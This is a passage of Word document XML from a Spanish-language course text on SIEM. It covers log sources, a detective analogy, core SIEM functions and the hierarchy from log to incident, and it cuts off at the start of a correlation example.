                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>NGFW: 50,000 entradas de log por día — conexiones permitidas, bloqueadas, alertas de IPS.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69CC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>IDS de red: 800 alertas por día — muchas de ellas falsos positivos sin contexto.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69CD" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Servidor web: 200,000 líneas de log por día — peticiones HTTP, errores, accesos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69CE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Servidores Linux: /var/log/auth.log, /var/log/syslog, /var/log/kern.log en cada uno.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69CF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Base de datos: logs de queries, conexiones, errores de autenticación.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69D0" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Total: cientos de miles de eventos por día en formatos distintos, en sistemas distintos, sin ninguna relación entre ellos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C69D2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C69D3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>El atacante lo sabe. Un ataque real se compone de múltiples pasos que dejan rastros en sistemas distintos: un escaneo de puertos en el IDS, luego intentos de login en el auth.log del servidor, luego una modificación de archivo en el filesystem, luego una conexión saliente en el NGFW. Sin nada que conecte esos eventos, el analista ve cuatro alertas individuales sin relación aparente — y el ataque pasa desapercibido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C69D4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="8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5"/>
        <w:gridCol w:w="8675"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C69DA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F6000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F3C69D5" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>💡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C69D6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F6000"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>ANALOGÍA — El detective y los testigos en comisarías distintas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69D7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Un crimen ocurrió. El testigo A reportó al norte que vio al sospechoso entrar al edificio. El testigo B reportó al sur que escuchó una alarma. El testigo C reportó al este que vio al sospechoso salir con una bolsa.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69D8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Sin alguien que hable con las tres comisarías y conecte los testimonios, el crimen nunca se resuelve. Cada comisaría tiene una pieza del rompecabezas pero ninguna tiene el cuadro completo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69D9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>El SIEM es el detective central que habla con todas las comisarías, conecta los testimonios y construye el caso completo. Los agentes HIDS son los testigos que reportan desde dentro del edificio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C69DB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C69DC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. SIEM — Security Information and Event Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C69DD" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Un SIEM es una plataforma que centraliza logs de múltiples fuentes, los normaliza a un formato común, aplica reglas de correlación para detectar patrones de ataque, y genera incidentes accionables con contexto completo. En una línea: el SIEM convierte ruido en señal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C69DE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C69DF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>2.1 Las tres funciones fundamentales del SIEM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880"/>
        <w:gridCol w:w="3680"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C69E3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C69E0" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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2F3C69E1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Qué hace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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2F3C69E2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sin SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C69E7"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F3C69E4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Centralización</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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F3C69E5" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Recibe logs de todos los dispositivos en un solo lugar, normalizados a formato común</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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F3C69E6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Cada herramienta tiene sus propios logs en su propio formato — no hay vista unificada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C69EB"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2F3C69E8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Correlación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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2F3C69E9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Conecta eventos de distintas fuentes que forman parte del mismo ataque aunque lleguen con minutos de diferencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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2F3C69EA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>El analista revisa alertas individualmente sin saber que están relacionadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C69EF"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F3C69EC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Priorización</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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F3C69ED" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Genera incidentes ordenados por severidad con contexto completo: origen, impacto, táctica, recomendación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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F3C69EE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>500 alertas diarias sin orden ni contexto — alert fatigue garantizada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C69F0" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C69F1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>2.2 La jerarquía: log → evento → alerta → incidente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C69F2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Entender esta jerarquía es fundamental para trabajar con cualquier SIEM. Cada nivel reduce el volumen pero aumenta el contexto y la accionabilidad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C69F3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>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560"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C69F8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C69F4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Nivel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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2F3C69F5" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Definición</w:t>
            </w:r>
          </w:p>
        </w:tc>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2F3C69F6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ejemplo concreto</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2F3C69F7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Volumen típico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C69FD"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F3C69F9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log</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F3C69FA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Registro crudo generado por un dispositivo</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F3C69FB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TCP 192.168.10.5:54321 → 192.168.20.10:445 ACCEPT 02:14:33</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F3C69FC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Millones/día</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C6A02"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2F3C69FE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Evento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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2F3C69FF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Log normalizado con contexto añadido por el SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>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2F3C6A00" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Intento de conexión SMB desde VLAN usuarios hacia servidor BD</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2F3C6A01" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cientos de miles/día</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C6A07"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F3C6A03" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Alerta</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F3C6A04" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Evento que coincide con una regla de detección</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F3C6A05" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Posible escaneo de puertos — Rule ID 5710</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F3C6A06" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cientos/día</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C6A0C"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2F3C6A08" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Incidente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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2F3C6A09" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Correlación de múltiples alertas que forman un patrón de ataque</w:t>
            </w:r>
          </w:p>
        </w:tc>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2F3C6A0A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Movimiento lateral en progreso: escaneo → brute force → exfiltración, origen 192.168.10.5</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2F3C6A0B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Decenas/día</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6A0D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A0E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>2.3 Ejemplo de correlación en tiempo real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A0F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>El siguiente ejemplo muestra cómo el SIEM conecta tres eventos dispersos que llegan de fuentes distintas en un período de 17 minutos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A10" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="6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121D" w:rsidRPr="003C1812" w14:paraId="2F3C6A27" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
